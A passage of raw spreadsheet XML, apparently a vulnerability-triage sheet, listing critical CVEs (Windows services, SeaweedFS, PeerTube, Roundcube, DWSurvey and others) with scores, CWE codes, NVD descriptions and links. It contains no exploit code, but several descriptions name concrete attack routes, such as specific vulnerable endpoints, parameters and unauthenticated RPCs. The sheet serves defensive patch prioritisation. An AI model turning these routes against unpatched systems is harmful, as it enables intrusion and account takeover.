        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L215" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69824</t>
        </is>
      </c>
      <c r="C216" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D216" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E216" s="5" t="inlineStr"/>
      <c r="F216" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G216" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L216" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="C217" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D217" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E217" s="5" t="inlineStr"/>
      <c r="F217" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G217" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L217" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="C218" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D218" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E218" s="5" t="inlineStr"/>
      <c r="F218" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G218" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H218" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="C219" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D219" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E219" s="5" t="inlineStr"/>
      <c r="F219" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G219" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L219" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="C220" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D220" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E220" s="5" t="inlineStr"/>
      <c r="F220" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G220" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L220" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71374</t>
        </is>
      </c>
      <c r="C221" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D221" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E221" s="5" t="inlineStr"/>
      <c r="F221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L221" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data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M221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71376</t>
        </is>
      </c>
      <c r="C222" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D222" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E222" s="5" t="inlineStr"/>
      <c r="F222" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr">
        <is>
          <t>OS command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M222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71377</t>
        </is>
      </c>
      <c r="C223" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D223" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E223" s="5" t="inlineStr"/>
      <c r="F223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L223" s="5" t="inlineStr">
        <is>
          <t>Command Argument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through 11-00-12, from 09-87 before 09-87-10, from 09-80 through 09-80-04, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t>
        </is>
      </c>
      <c r="M223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71624</t>
        </is>
      </c>
      <c r="C224" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D224" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E224" s="5" t="inlineStr"/>
      <c r="F224" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr">
        <is>
          <t>An issue in esoTalk v.1.0.0g4 allows a remote attacker to execute arbitrary code via the core/models/ETMemberModel.class.php, core/controllers/ETMemberController.class.php, and core/lib/ET.class.php components</t>
        </is>
      </c>
      <c r="M224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71624</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71625</t>
        </is>
      </c>
      <c r="C225" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D225" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E225" s="5" t="inlineStr"/>
      <c r="F225" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-640</t>
        </is>
      </c>
      <c r="L225" s="5" t="inlineStr">
        <is>
          <t>An issue in slimkit plus ThinkSNS+ v.2.4 allows a remote attacker to escalate privileges via the ResetPasswordController.php component</t>
        </is>
      </c>
      <c r="M225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71625</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71805</t>
        </is>
      </c>
      <c r="C226" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D226" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E226" s="5" t="inlineStr"/>
      <c r="F226" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L226" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload and path traversal vulnerability exists in LZ-litchi 1.0.0. Unauthenticated remote attackers can upload arbitrary files and write them outside the intended storage directory via the directory parameter in POST /app-api/infra/file/upload.</t>
        </is>
      </c>
      <c r="M226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71805</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7188</t>
        </is>
      </c>
      <c r="C227" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D227" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E227" s="5" t="inlineStr"/>
      <c r="F227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Armiya Information Technologies Ltd. Co. Access Control System allows SQL Injection.
This issue affects Access Control System: before Versiyon 2.</t>
        </is>
      </c>
      <c r="M227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7188</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72920</t>
        </is>
      </c>
      <c r="C228" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D228" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E228" s="5" t="inlineStr"/>
      <c r="F228" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L228" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system. Prior to 4.24, the filer registers the SeaweedIdentityAccessManagement gRPC service without mandatory authentication when jwt.filer_signing.key is unset, allowing any client that can reach the filer gRPC port to invoke CreateUser, CreateAccessKey, PutPolicy, and related IAM RPCs to mint credentials and gain S3 administrative control. This issue is fixed in versions 4.24.</t>
        </is>
      </c>
      <c r="M228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72920</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72979</t>
        </is>
      </c>
      <c r="C229" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D229" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E229" s="5" t="inlineStr"/>
      <c r="F229" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G229" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L229" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72982</t>
        </is>
      </c>
      <c r="C230" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D230" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E230" s="5" t="inlineStr"/>
      <c r="F230" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G230" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L230" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72983</t>
        </is>
      </c>
      <c r="C231" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D231" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E231" s="5" t="inlineStr"/>
      <c r="F231" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G231" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L231" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73009</t>
        </is>
      </c>
      <c r="C232" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D232" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E232" s="5" t="inlineStr"/>
      <c r="F232" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G232" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L232" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73010</t>
        </is>
      </c>
      <c r="C233" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D233" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E233" s="5" t="inlineStr"/>
      <c r="F233" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G233" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L233" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73025</t>
        </is>
      </c>
      <c r="C234" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D234" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E234" s="5" t="inlineStr"/>
      <c r="F234" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G234" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73211</t>
        </is>
      </c>
      <c r="C235" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D235" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E235" s="5" t="inlineStr"/>
      <c r="F235" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L235" s="5" t="inlineStr">
        <is>
          <t>PeerTube is an ActivityPub-federated video streaming platform. Prior to 8.1.6, ActorFollowModel.updateScore() interpolates the attacker-controlled ActivityPub actor inboxUrl into an SQL query, allowing an unauthenticated remote server to read and write PeerTube database tables, including oAuthToken.accessToken, and take over administrator accounts. This issue is fixed in version 8.1.6.</t>
        </is>
      </c>
      <c r="M235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73211</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73778</t>
        </is>
      </c>
      <c r="C236" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D236" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E236" s="5" t="inlineStr"/>
      <c r="F236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236"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I236" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>CWE-521</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in the Credential Manager component that may allow for unauthorized administrative access. An unauthenticated remote attacker could exploit this vulnerability on a device in its factory-default or post-ZTP state before any administrator has configured credentials by providing a predictable factory-default password. Successful exploitation could result in full administrative control of the affected device during the initial setup process.</t>
        </is>
      </c>
      <c r="M236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73778</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75003</t>
        </is>
      </c>
      <c r="C237" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D237" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E237" s="5" t="inlineStr"/>
      <c r="F237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I237" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L237" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, an unclosed url() in a FuncIRI attribute of an SVG image could evade the remote image blocking, which may lead to information disclosure or privilege escalation.</t>
        </is>
      </c>
      <c r="M237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75003</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75325</t>
        </is>
      </c>
      <c r="C238" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D238" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E238" s="5" t="inlineStr"/>
      <c r="F238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L238" s="5" t="inlineStr">
        <is>
          <t>DWSurvey v6.14.0 is is vulnerable to authentication bypass via the '/api/dwsurvey/none/' and '/api/dwsurvey/up/**' parameters.</t>
        </is>
      </c>
      <c r="M238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75325</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75337</t>
        </is>
      </c>
      <c r="C239" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D239" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E239" s="5" t="inlineStr"/>
      <c r="F239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr">
        <is>
